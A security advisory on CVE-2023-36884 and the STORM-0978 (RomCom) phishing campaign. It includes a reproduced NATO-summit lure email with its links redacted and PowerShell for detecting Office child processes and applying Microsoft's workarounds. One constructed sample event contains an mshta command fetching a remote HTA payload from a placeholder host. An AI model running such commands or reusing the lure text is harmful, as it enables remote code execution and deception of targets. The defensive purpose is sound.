
How (not) to get hacked in MS office - the latest MS Office Phishing and Exploit Campaign

Take action: As always, if a message is unexpected and either urgent, too good to be true or triggers an emotional reaction, don't trust it. Above all, don't open anything in the message, whether link or attachment.

A critical security vulnerability, CVE-2023-36884, has recently been reported in Microsoft Office and Windows HTML. It allows an attacker to execute code on a targeted system; the victim only has to open a specially crafted document.

A well-known criminal group tracked as STORM-0978 (also known as RomCom or DEV-0978) has been observed exploiting this vulnerability. It targets defense and government organizations across North America and Europe and delivers its own set of tools, including the RomCom backdoor and Underground ransomware.

Campaign Overview
In July 2023, Microsoft officially acknowledged CVE-2023-36884; at the time of writing the patch was still pending and Microsoft recommended workarounds until it becomes available. No separate exploit program has to be run: all it takes is for a user to open a specially crafted Office document.

STORM-0978 took advantage of how little user interaction the attack needs and launched a phishing campaign, using a malicious Word document delivered through a phishing email as the attack vector.

According to CERT-UA, Storm-0978 compromised a Ukrainian Ministry of Defense email account to send the phishing emails. The lure PDFs attached to the emails contained links to a threat-actor-controlled website hosting information-stealing malware. Here is an example of the message, with the URLs intentionally redacted.

Dear Ladies and Gentlemen,
On behalf of Ukrainian World Congress, please find the invitation letter for the NATO Summit. The summit will take place in Vilnius, Lithuania from 11th till 12th July 2023.

Given that Ukraine's victory will not be possible without strong, consistent military, financial and political support from NATO member states, we call on all Ukrainians and friends of Ukraine to send letters to NATO countries' governments or forward it to us.

You should review the Overview sheet and Letter form. Please fill out the letter form to support Ukraine and its people.

Updated version of files you can find below.
Overview: https://www.redacted_link.info/redacted_path/Overview of UWCsUkrainelnNATOcampaign.doc
Letter form: https://www.redacted_link.info/redacted_path//Letter NATO Summit Vilnius 2023 ENG.doc

Support Ukraine on its Euro-Atlantic path!
Sincerely yours,
Communications Manager

Once opened, the document causes Word to spawn unexpected child processes such as mshta.exe, splwow64.exe, powershell.exe or cmd.exe.
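The parent/child relationship described above is the most useful hunting signal for this campaign. The following PowerShell is an added example, not code from the original article or from any vendor: it flags process-creation records in which an Office application is the parent of one of the child processes listed above. The records are constructed inline (the URL uses the reserved example.invalid domain) so the script runs offline; in production you would feed it Sysmon Event ID 1 events or EDR telemetry instead.

```powershell
# Added example: detect Office applications spawning the child processes seen in this campaign.
# Sample events below are constructed for illustration; they mirror the Sysmon Event ID 1 fields
# (ParentImage, Image, CommandLine) and are not real telemetry.

$officeParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe')
$suspiciousChildren = @('mshta.exe', 'powershell.exe', 'cmd.exe', 'splwow64.exe',
                        'wscript.exe', 'cscript.exe', 'rundll32.exe')

function Test-OfficeChildProcess {
    param(
        [Parameter(Mandatory)] [string] $ParentImage,
        [Parameter(Mandatory)] [string] $Image
    )
    # Compare on the file name only; paths differ between Click-to-Run and MSI installs.
    $parent = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    $child  = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    return ($officeParents -contains $parent) -and ($suspiciousChildren -contains $child)
}

# Constructed sample events: two from Word (one clearly malicious, one ambiguous) and one benign.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2023-07-11T09:12:03'; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image = 'C:\Windows\System32\mshta.exe'; CommandLine = 'mshta.exe http://payload.example.invalid/update.hta' }
    [pscustomobject]@{ TimeCreated = '2023-07-11T09:12:05'; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image = 'C:\Windows\splwow64.exe'; CommandLine = 'splwow64.exe 12288' }
    [pscustomobject]@{ TimeCreated = '2023-07-11T09:15:40'; ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c dir' }
)

$hits = $sampleEvents | Where-Object { Test-OfficeChildProcess -ParentImage $_.ParentImage -Image $_.Image }
$hits | Format-Table TimeCreated, ParentImage, Image, CommandLine -AutoSize

# To run against real Sysmon data instead of the constructed sample, replace $sampleEvents with
# something like the following (left commented out so the script stays offline):
# $sampleEvents = Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]' |
#     ForEach-Object { $x = [xml]$_.ToXml(); $d = @{}; $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }; [pscustomobject]$d }
```

Two of the three constructed events match. Treat splwow64.exe hits as lower confidence on their own: Word legitimately starts it when printing through a 32-bit driver on 64-bit Windows, so correlate it with a following mshta.exe or powershell.exe child, or with an outbound connection from the Office process, before escalating.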

Technical Details
The phishing campaign run by STORM-0978 uses a carefully crafted Microsoft Office document to download a malicious payload onto the victim's system, typically a backdoor such as the RomCom malware. The exploit chain relies on RTF (Rich Text Format) content embedded in the document: it causes the Office application to make an outbound connection and pull OLE (Object Linking & Embedding) streams from the attacker's server, which ultimately deploys the RomCom backdoor.

Taking Technical Action Against CVE-2023-36884
To protect against exploitation of CVE-2023-36884, Microsoft advises enabling the attack surface reduction rule "Block all Office applications from creating child processes" until official patches are available. The exploit chain depends on Office spawning processes such as mshta.exe or powershell.exe, so this rule breaks it.

Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884. In addition, customers who use Microsoft 365 Apps (Versions 2302 and later) are protected from exploitation of the vulnerability via Office.

Organizations that cannot use either of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to prevent exploitation. No OS restart is required, but restarting the applications the key was added for is recommended, in case the value was already queried and cached.

Note that while these registry settings mitigate exploitation, they can affect regular functionality in some use cases of the affected applications, so test before rolling them out. To disable the mitigation, delete the registry key or set its values to 0.
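The three steps above (enable the ASR rule, fall back to the registry key where ASR is unavailable, test and be able to roll back) can be scripted. The following is an added example, not Microsoft's own tooling or code from the original article. It assumes an elevated PowerShell session on a host running Microsoft Defender Antivirus; the ASR rule GUID and the registry path and value names are the ones published in Microsoft's guidance for this rule and this CVE, but confirm them against the current advisory before deploying.

```powershell
# Added example: apply, verify and roll back the CVE-2023-36884 workarounds.
# Run from an elevated PowerShell session.

# --- 1. ASR rule "Block all Office applications from creating child processes" ---
# Defender identifies ASR rules by GUID; this is the published GUID for that rule.
$asrOfficeChildProcesses = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'

# Start in audit mode: would-be blocks are only logged (Defender Operational log, Event ID 1122),
# which shows whether any legitimate workflow in your environment would break.
Add-MpPreference -AttackSurfaceReductionRules_Ids $asrOfficeChildProcesses -AttackSurfaceReductionRules_Actions AuditMode

# After reviewing the audit events, switch the same rule to block mode.
Add-MpPreference -AttackSurfaceReductionRules_Ids $asrOfficeChildProcesses -AttackSurfaceReductionRules_Actions Enabled

# Verify: the Ids and Actions arrays from Get-MpPreference line up by index
# (0 = Off, 1 = Block, 2 = Audit, 6 = Warn). String -eq is case-insensitive in PowerShell.
$prefs = Get-MpPreference
for ($i = 0; $i -lt $prefs.AttackSurfaceReductionRules_Ids.Count; $i++) {
    if ($prefs.AttackSurfaceReductionRules_Ids[$i] -eq $asrOfficeChildProcesses) {
        "ASR rule action: $($prefs.AttackSurfaceReductionRules_Actions[$i])"
    }
}

# --- 2. Registry workaround for hosts without Defender ASR or a current Microsoft 365 Apps build ---
$featureKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION'
# Each application listed in Microsoft's advisory gets a REG_DWORD value of 1 under the key.
$officeExecutables = @('Excel.exe', 'Graph.exe', 'MSAccess.exe', 'MSPub.exe', 'PowerPoint.exe',
                       'Visio.exe', 'WinProj.exe', 'WinWord.exe', 'Wordpad.exe')

New-Item -Path $featureKey -Force | Out-Null        # creates intermediate keys if missing
foreach ($exe in $officeExecutables) {
    New-ItemProperty -Path $featureKey -Name $exe -PropertyType DWord -Value 1 -Force | Out-Null
}

# Verify the values were written. Applications that were already running must be restarted
# to pick the setting up, since the value may have been queried and cached.
Get-ItemProperty -Path $featureKey | Select-Object $officeExecutables

# --- 3. Roll back (if the mitigation breaks a workflow during testing) ---
# Either set the values to 0, or remove the key and the ASR rule entirely:
# foreach ($exe in $officeExecutables) { Set-ItemProperty -Path $featureKey -Name $exe -Value 0 }
# Remove-Item -Path $featureKey -Recurse
# Remove-MpPreference -AttackSurfaceReductionRules_Ids $asrOfficeChildProcesses
```

Roll the ASR rule out in audit mode first and review Event ID 1122 for a few days: environments with Office add-ins that spawn helper processes, or print workflows that rely on splwow64.exe, are the usual sources of false positives. The registry key applies per executable name, so an application not on the list (a third-party viewer, for example) is not covered by it.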

Taking Human Action Against CVE-2023-36884

The same rules as for any other phishing campaign apply: if you are not expecting an email, and it presses you to act quickly or triggers an emotional reaction (positive or negative) and asks you to take some action, stop, think about the email and consult your security team.
